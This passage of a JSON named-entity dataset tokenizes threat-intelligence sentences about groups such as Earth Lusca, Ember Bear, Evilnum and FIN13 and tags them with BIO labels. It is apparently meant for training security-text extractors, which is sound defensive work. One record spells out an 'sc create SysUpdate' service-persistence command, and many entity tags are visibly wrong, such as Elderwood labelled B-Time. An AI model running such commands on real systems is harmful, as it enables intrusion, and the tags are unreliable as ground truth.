"connections.", "Earth", "Lusca", "has", "also", "used", "netstat", "from", "a", "compromised", "system", "to", "obtain", "network", "connection", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "collected", "information", "on", "user", "accounts", "via", "the", "<code>whoami</code>", "command." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "used", "Tasklist", "to", "obtain", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "acquired", "and", "used", "a", "variety", "of", "open", "source", "tools." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "staged", "malware", "and", "malicious", "files", "on", "compromised", "web", "servers,", "GitHub,", "and", "Google", "Drive." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "used", "VBA", "scripts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Earth", "Lusca", "has", "scanned", "for", "vulnerabilities", "in", "the", "public-facing", "servers", "of", "their", "targets." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "established", "GitHub", "accounts", "to", "host", "their", "malware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "has", "compromised", "Google", "Drive", "repositories." ], "ner_tags": [ "I-HackOrg", "B-Exp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "used", "a", "VBA", "script", "to", "execute", "WMI." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Earth", "Lusca", "created", "a", "service", "using", "the", "command", "<code>sc", "create", "“SysUpdate”", "binpath=", "“cmd", "/c", "start", "“[file", "path]””&&sc", "config", "“SysUpdate”", "start=", "auto&&net", "start", "SysUpdate</code>", "for", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "delivered", "zero-day", "exploits", "and", "malware", "to", "victims", "by", "injecting", "malicious", "code", "into", "specific", "public", "Web", "pages", "visited", "by", "targets", "within", "a", "particular", "sector." ], "ner_tags": [ "B-Time", "O", "O", "B-Features", "B-Exp", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "encrypted", "documents", "and", "malicious", "executables." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "used", "exploitation", "of", "endpoint", "software,", "including", "Microsoft", "Internet", "Explorer", "Adobe", "Flash", "vulnerabilities,", "to", "gain", "execution.", "They", "have", "also", "used", "zero-day", "exploits." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Exp", "I-Tool", "I-Tool", "I-Exp", "I-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp" ] }, { "tokens": [ "The", "Ritsol", "backdoor", "trojan", "used", "by", "Elderwood", "can", "download", "files", "onto", "a", "compromised", "host", "from", "a", "remote", "location." ], "ner_tags": [ "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "leveraged", "multiple", "types", "of", "spearphishing", "in", "order", "to", "attempt", "to", "get", "a", "user", "to", "open", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "leveraged", "multiple", "types", "of", "spearphishing", "in", "order", "to", "attempt", "to", "get", "a", "user", "to", "open", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "packed", "malware", "payloads", "before", "delivery", "to", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "delivered", "zero-day", "exploits", "and", "malware", "to", "victims", "via", "targeted", "emails", "containing", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "B-Exp", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Elderwood", "has", "delivered", "zero-day", "exploits", "and", "malware", "to", "victims", "via", "targeted", "emails", "containing", "a", "link", "to", "malicious", "content", "hosted", "on", "an", "uncommon", "Web", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "B-Exp", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "added", "extra", "spaces", "between", "JavaScript", "code", "characters", "to", "increase", "the", "overall", "file", "size." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "used", "stolen", "certificates", "from", "Electrum", "Technologies", "GmbH", "to", "sign", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-OffAct", "O", "O", "B-Org", "B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "stolen", "legitimate", "certificates", "to", "sign", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "obfuscated", "malicious", "scripts", "to", "help", "avoid", "detection." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "used", "control", "panel", "files", "(CPL),", "delivered", "via", "e-mail,", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "executed", "a", "batch", "script", "designed", "to", "disable", "Windows", "Defender", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "exploited", "Microsoft", "Office", "vulnerability", "CVE-2017-11882." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features" ] }, { "tokens": [ "Ember", "Bear", "has", "used", "tools", "to", "download", "malicious", "code." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "used", "JavaScript", "to", "execute", "malicious", "code", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "attempted", "to", "lure", "victims", "into", "executing", "malicious", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "attempted", "to", "lure", "users", "to", "click", "on", "a", "malicious", "link", "within", "a", "spearphishing", "email." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "used", "an", "open", "source", "batch", "script", "to", "modify", "Windows", "Defender", "registry", "keys." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "obfuscated", "malware", "to", "help", "avoid", "detection." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "used", "PowerShell", "to", "download", "and", "execute", "malicious", "code." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "packed", "malware", "to", "help", "avoid", "detection." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "sent", "spearphishing", "emails", "containing", "malicious", "attachments", "in", "the", "form", "of", "PDFs,", "Word", "documents,", "JavaScript", "files,", "and", "Control", "Panel", "File", "(CPL)", "executables." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "sent", "spearphishing", "emails", "containing", "malicious", "links." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "obtained", "and", "used", "open", "source", "scripts", "from", "GitHub." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "has", "used", "Discord's", "content", "delivery", "network", "(CDN)", "to", "deliver", "malware", "and", "malicious", "scripts", "to", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ember", "Bear", "had", "used", "`cmd.exe`", "and", "Windows", "Script", "Host", "(wscript)", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "I-Tool", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Equation", "is", "known", "to", "have", "the", "capability", "to", "overwrite", "the", "firmware", "on", "hard", "drives", "from", "some", "manufacturers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Equation", "has", "been", "observed", "utilizing", "environmental", "keying", "in", "payload", "delivery." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Equation", "has", "used", "an", "encrypted", "virtual", "file", "system", "stored", "in", "the", "Windows", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Equation", "has", "used", "tools", "with", "the", "functionality", "to", "search", "for", "specific", "information", "about", "the", "attached", "hard", "drive", "that", "could", "be", "used", "to", "identify", "and", "overwrite", "the", "firmware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Evilnum", "has", "used", "PowerShell", "to", "bypass", "UAC." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "can", "collect", "email", "credentials", "from", "victims." ], "ner_tags": [ "B-Idus", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "has", "used", "the", "malware", "variant,", "TerraTV,", "to", "load", "a", "malicious", "DLL", "placed", "in", "the", "TeamViewer", "directory,", "instead", "of", "the", "original", "Windows", "DLL", "located", "in", "a", "system", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "has", "deleted", "files", "used", "during", "infection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "can", "deploy", "additional", "components", "or", "tools", "as", "needed." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "has", "used", "malicious", "JavaScript", "files", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "has", "sent", "spearphishing", "emails", "designed", "to", "trick", "the", "recipient", "into", "opening", "malicious", "shortcut", "links", "which", "downloads", "a", ".LNK", "file." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "EVILNUM", "has", "used", "the", "malware", "variant,", "TerraTV,", "to", "run", "a", "legitimate", "TeamViewer", "application", "to", "connect", "to", "compromrised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "has", "sent", "spearphishing", "emails", "containing", "a", "link", "to", "a", "zip", "file", "hosted", "on", "Google", "Drive." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "can", "steal", "cookies", "and", "session", "information", "from", "browsers." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Evilnum", "has", "used", "a", "component", "called", "TerraLoader", "to", "check", "certain", "hardware", "and", "file", "information", "to", "detect", "sandboxed", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "used", "batch", "scripts", "and", "scheduled", "tasks", "to", "delete", "critical", "system", "files." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "deployed", "Meterpreter", "stagers", "and", "SplinterRAT", "instances", "in", "the", "victim", "network", "after", "moving", "laterally." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "moved", "laterally", "using", "the", "Local", "Administrator", "account." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "uses", "PowerShell", "for", "execution", "as", "well", "as", "PowerShell", "Empire", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "established", "persistence", "by", "using", "the", "Registry", "option", "in", "PowerShell", "Empire", "to", "add", "a", "Run", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "used", "RDP", "to", "move", "laterally", "to", "systems", "in", "the", "victim", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "established", "persistence", "by", "using", "S4U", "tasks", "as", "well", "as", "the", "Scheduled", "Task", "option", "in", "PowerShell", "Empire." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FIN10", "has", "used", "Meterpreter", "to", "enumerate", "users", "on", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "relied", "on", "publicly-available", "software", "to", "gain", "footholds", "and", "establish", "persistence", "in", "victim", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "used", "stolen", "credentials", "to", "connect", "remotely", "to", "victim", "networks", "using", "VPNs", "protected", "with", "only", "a", "single", "factor." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN10", "has", "executed", "malicious", ".bat", "files", "containing", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "FIN13", "has", "enumerated", "all", "users", "and", "their", "roles", "from", "a", "victim's", "main", "treasury", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "assigned", "newly", "created", "accounts", "the", "sysadmin", "role", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "compressed", "the", "dump", "output", "of", "compromised", "credentials", "with", "a", "7zip", "binary." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "obtained", "administrative", "credentials", "by", "browsing", "through", "local", "files", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "IISCrack.dll", "as", "a", "side-loading", "technique", "to", "load", "a", "malicious", "version", "of", "httpodbc.dll", "on", "old", "IIS", "Servers", "(CVE-2001-0507)." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "FIN13", "has", "injected", "fraudulent", "transactions", "into", "compromised", "networks", "that", "mimic", "legitimate", "behavior", "to", "siphon", "off", "incremental", "amounts", "of", "money." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "FIN13", "has", "gathered", "stolen", "credentials,", "sensitive", "data", "such", "as", "point-of-sale", "(POS),", "and", "ATM", "data", "from", "a", "compromised", "network", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "leveraged", "default", "credentials", "for", "authenticating", "myWebMethods", "(WMS)", "and", "QLogic", "web", "management", "interface", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "`certutil`", "to", "decode", "base64", "encoded", "versions", "of", "custom", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "can", "identify", "user", "accounts", "associated", "with", "a", "Service", "Principal", "Name", "and", "query", "Service", "Principal", "Names", "within", "the", "domain", "by", "utilizing", "the", "following", "scripts:", "`GetUserSPNs.vbs`", "and", "`querySpn.vbs`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "FIN13", "has", "exploited", "known", "vulnerabilities", "such", "as", "CVE-2017-1000486", "(Primefaces", "Application", "Expression", "Language", "Injection),", "CVE-2015-7450", "(WebSphere", "Application", "Server", "SOAP", "Deserialization", "Exploit),", "CVE-2010-5326", "(SAP", "NewWeaver", "Invoker", "Servlet", "Exploit),", "and", "EDB-ID-24963", "(SAP", "NetWeaver", "ConfigServlet", "Remote", "Code", "Execution)", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "gained", "access", "to", "compromised", "environments", "via", "remote", "access", "services", "such", "as", "the", "corporate", "virtual", "private", "network", "(VPN)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "FIN13", "has", "used", "the", "Windows", "`dir`", "command", "to", "enumerate", "files", "and", "directories", "in", "a", "victim's", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "observed", "the", "victim's", "software", "and", "infrastructure", "over", "several", "months", "to", "understand", "the", "technical", "process", "of", "legitimate", "financial", "transactions,", "prior", "to", "attempting", "to", "conduct", "fraudulent", "transactions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "researched", "employees", "to", "target", "for", "social", "engineering", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "O", "O", "O", "I-OffAct", "I-OffAct", "O" ] }, { "tokens": [ "FIN13", "has", "created", "hidden", "files", "and", "folders", "within", "a", "compromised", "Linux", "system", "`/tmp`", "directory.", "FIN13", "also", "has", "used", "`attrib.exe`", "to", "hide", "gathered", "local", "host", "information." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "FIN13", "has", "downloaded", "additional", "tools", "and", "malware", "to", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "a", "proxy", "tool", "to", "communicate", "between", "compromised", "assets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "`Ping`", "and", "`tracert`", "for", "network", "reconnaissance", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "logged", "the", "keystrokes", "of", "victims", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "obtained", "memory", "dumps", "with", "ProcDump", "to", "parse", "and", "extract", "credentials", "from", "a", "victim's", "LSASS", "process", "memory", "with", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "FIN13", "has", "created", "MS-SQL", "local", "accounts", "in", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "the", "following", "temporary", "folders", "on", "compromised", "Windows", "and", "Linux", "systems", "for", "their", "operations", "prior", "to", "exfiltration:", "`C:\\Windows\\Temp`", "and", "`/tmp`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "tools", "such", "as", "Incognito", "V2", "for", "token", "manipulation", "and", "impersonation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "custom", "malware", "to", "maintain", "persistence", "in", "a", "compromised", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "FIN13", "has", "used", "scheduled", "tasks", "names", "such", "as", "`acrotyr`", "and", "`AppServicesr`", "to", "mimic", "the", "same", "names", "in", "a", "compromised", "network's", "`C:\\Windows`", "directory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "masqueraded", "staged", "data", "by", "using", "the", "Windows", "certutil", "utility", "to", "generate", "fake", "Base64", "encoded", "certificates", "with", "the", "input", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "masqueraded", "WAR", "files", "to", "look", "like", "legitimate", "packages", "such", "as,", "wsexample.war,", "wsexamples.com,", "examples.war,", "and", "exampl3s.war." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "FIN13", "has", "replaced", "legitimate", "KeePass", "binaries", "with", "trojanized", "versions", "to", "collect", "passwords", "from", "numerous", "applications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "harvested", "the", "NTDS.DIT", "file", "and", "leveraged", "the", "Impacket", "tool", "on", "the", "compromised", "domain", "controller", "to", "locally", "decrypt", "it." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "`nmap`", "for", "reconnaissance", "efforts.", "FIN13", "has", "also", "scanned", "for", "internal", "MS-SQL", "servers", "in", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "executed", "net", "view", "commands", "for", "enumeration", "of", "open", "shares", "on", "compromised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "searched", "for", "infrastructure", "that", "can", "provide", "remote", "access", "to", "an", "environment", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "the", "PowerShell", "utility", "`Invoke-SMBExec`", "to", "execute", "the", "pass", "the", "hash", "method", "for", "lateral", "movement", "within", "an", "compromised", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "enumerated", "all", "users", "and", "roles", "from", "a", "victim's", "main", "treasury", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "PowerShell", "commands", "to", "obtain", "DNS", "data", "from", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "web", "shells", "and", "Java", "tools", "for", "tunneling", "capabilities", "to", "and", "from", "compromised", "assets." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { 